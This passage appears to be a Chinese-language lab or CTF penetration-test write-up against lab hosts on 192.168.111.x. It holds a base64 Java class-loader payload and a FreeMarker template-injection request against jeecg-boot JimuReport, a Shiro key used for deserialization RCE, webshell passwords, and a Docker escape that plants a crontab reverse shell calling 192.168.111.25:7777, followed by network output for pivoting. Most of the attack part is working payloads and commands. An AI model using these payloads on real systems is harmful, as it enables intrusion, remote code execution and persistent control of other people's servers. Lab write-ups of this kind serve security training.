ABgCnAAsAqAAaAAAAIAADAAAAEQFFABwAAAAAABEBRgEEAAEABgALAUcBSAACAAsAAAAEAAEAGAAIAUkBSgACAAcAAADHAAMABAAAACgqtgB6TSzGABksK7YBV04tBLYBTy2wTiy2AVpNp//puwFSWSu3AVu/AAEACQAVABYBUgAEABkAAAAmAAkAAACsAAUArQAJAK8ADwCwABQAsQAWALIAFwCzABwAtAAfALYAGgAAADQABQAPAAcBRwFIAAMAFwAFAEoBUwADAAAAKAFFABwAAAAAACgBRgEEAAEABQAjAKcAqAACACIAAAAMAAEABQAjAKcBEAACACgAAAANAAP8AAUHAHxQBwFSCAALAAAABAABAVIAKABYAFkAAgAHAAAAQgAEAAIAAAAOKisDvQB8A70ABLgA7bAAAAACABkAAAAGAAEAAAC6ABoAAAAWAAIAAAAOAVwAHAAAAAAADgFdAQQAAQALAAAACAADAJwAmgCeACkAWADrAAIABwAAAhcAAwAJAAAAyirBAHyZAAoqwAB8pwAHKrYAejoEAToFGQQ6BhkFxwBkGQbGAF8sxwBDGQa2AWs6BwM2CBUIGQe+ogAuGQcVCDK2AWwrtgFvmQAZGQcVCDK2AXO+mgANGQcVCDI6BacACYQIAaf/0KcADBkGKyy2ANE6Baf/qToHGQa2AVo6Bqf/nRkFxwAMuwCcWSu3AXS/GQUEtgDXKsEAfJkAGhkFAS22AN+wOge7AJVZGQe2AXe3AXi/GQUqLbYA37A6B7sAlVkZB7YBd7cBeL8AAwAlAHIAdQCcAJwAowCkAJoAswC6ALsAmgADABkAAABuABsAAAC+ABQAvwAXAMEAGwDCACUAxAApAMYAMADHADsAyABWAMkAXQDKAGAAxwBmAM0AaQDOAHIA0gB1ANAAdwDRAH4A0gCBANQAhgDVAI8A1wCVANgAnADaAKQA2wCmANwAswDgALsA4QC9AOIAGgAAAHoADAAzADMBAQECAAgAMAA2AV4BXwAHAHcABwBKAWAABwCmAA0ASgFhAAcAvQANAEoBYQAHAAAAygFFABwAAAAAAMoBXQEEAAEAAADKAWIBYwACAAAAygFkAOEAAwAUALYApwCoAAQAFwCzAWUApgAFABsArwFmAKgABgAoAAAALwAODkMHAHz+AAgHAHwHANMHAHz9ABcHAWcBLPkABQIIQgcAnAsNVAcAmg5HBwCaAAsAAAAIAAMAnACeAJoACAF5ABYAAQAHAAAAJQACAAAAAAAJuwACWbcBelexAAAAAQAZAAAACgACAAAAIQAIACIAAA==';try{clsBase64=classLoader.loadClass('java.util.Base64');clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);}catch(ee){try{datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);}catch(eee){clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);}}clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');clsByteArray=(''.getBytes().getClass());clsInt=java.lang.Integer.TYPE;defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);clazz.newInstance();};#{1};\")}","dbSource":"","type":"0"}

http://192.168.111.22:18088/jeecg-boot/jmreport/queryFieldBySql

密码：test

请求头：User-Agent: Bhimaw

loadTableData SSTI模板注入

POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13
Content-Type: application/json; charset=utf-8
Content-Length: 165
Host: 192.168.111.22:18088
Connection: keep-alive
Accept-Encoding: gzip, deflate, br

{"dbSource":"","sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'","tableName":"test_demo);","pageNo":1,"pageSize":10}

DocToolkit 系统RCE(成功)

http://192.168.111.22:18080/

在路径/home/ubuntu/doctool.jar找到源码，下载反编译一下

/doctool.jar!/BOOT-INF/classes/com/example/doctoolkit/shiro/ShiroConfig.class

找到 shiro 密钥QZIysgMYhG7/CzIJlVpR1g==

GitHub - SummerSec/ShiroAttack2: shiro反序列化漏洞综合利用,包含（回显执行命令/注入内存马）修复原版中NoCC的问题 https://github.com/j1anFen/shiro_attack

Docker 逃逸

发现当前在 docker 环境中

cat /proc/1/cgroup

ls -la /.dockerenv

df -h

嘶怎么个事再看看 shiro 环境

路径：http://192.168.111.22:18080/test

密码：pass1024

发现存在挂载,挂载的是宿主机的目录

这里有个flag{nItAM4shIzhenN1ubi}

挂载进行定时任务逃逸

# 1. 进入宿主机tmp目录
cd /dev/tmp/tmp

# 2. 创建test.sh 并写入内容
cat > test.sh <<'EOF'
#!/bin/bash
bash -i >& /dev/tcp/192.168.111.25/7777 0>&1
sh -i >& /dev/tcp/192.168.111.25/7777 0>&1
/bin/sh -i >& /dev/tcp/192.168.111.25/7777 0>&1
/bin/bash -i >& /dev/tcp/192.168.111.25/7777 0>&1
/bin/bash -i >& /dev/tcp/192.168.111.25/7777 0>&1
EOF

# 3. 赋予可执行权限
chmod +x test.sh

# 4. 定时任务反弹shell
sed -i '$a*/1 * * * * root bash /tmp/test.sh' /dev/tmp/etc/crontab

nc -lv 7777

内网一层代理

root@wty-virtual-machine:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b1:3a:e7 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    inet 192.168.111.22/24 brd 192.168.111.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:feb1:3ae7/64 scope link 
       valid_lft forever preferred_lft forever
3: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:b1:62:bf brd ff:ff:ff:ff:ff:ff
    altname enp2s1
    inet 192.168.80.50/24 brd 192.168.80.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:feb1:62bf/64 scope link 
       valid_lft forever preferred_lft forever
4: br-2ed9e624a55e: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:86:33:b1:e6 brd ff:ff:ff:ff:ff:ff
    inet 172.20.0.1/16 brd 172.20.255.255 scope global br-2ed9e624a55e
       valid_lft forever preferred_lft forever
    inet6 fe80::42:86ff:fe33:b1e6/64 scope link 
       valid_lft forever preferred_lft forever
5: br-5c4f24880ae8: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:90:1f:d0:a6 brd ff:ff:ff:ff:ff:ff
    inet 172.19.0.1/16 brd 172.19.255.255 scope global br-5c4f24880ae8
       valid_lft forever preferred_lft forever
6: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:7a:e0:9d:e5 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
7: br-a8cbb2f18fd5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:a1:8e:71:2a brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-a8cbb2f18fd5
       valid_lft forever preferred_lft forever
    inet6 fe80::42:a1ff:fe8e:712a/64 scope link 
       valid_lft forever preferred_lft forever
9: vethb31e178@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-2ed9e624a55e state UP group default 
    link/ether 2a:fa:8c:44:8f:42 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::28fa:8cff:fe44:8f42/64 scope link 
       valid_lft forever preferred_lft forever
11: veth330c26c@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-2ed9e624a55e state UP group default 
    link/ether 7a:0a:7e:fa:82:14 brd ff:ff:ff:ff:ff:ff link-netnsid 1
    inet6 fe80::780a:7eff:fefa:8214/64 scope link 
       valid_lft forever preferred_lft forever
13: vethea4b282@if12: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-2ed9e624a55e state UP group default 
    link/ether 46:70:f8:09:e5:9b brd ff:ff:ff:ff:ff:ff link-netnsid 2
    inet6 fe80::4470:f8ff:fe09:e59b/64 scope link 
       valid_lft forever preferred_lft forever
15: veth6409444@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-a8cbb2f18fd5 state UP group default 
    link/ether ea:0d:25:9a:29:33 brd ff:ff:ff:ff:ff:ff link-netnsid 3
    inet6 fe80::e80d:25ff:fe9a:2933/64 scope link 
       valid_lft forever preferred_lft forever
root@wty-virtual-machine:~#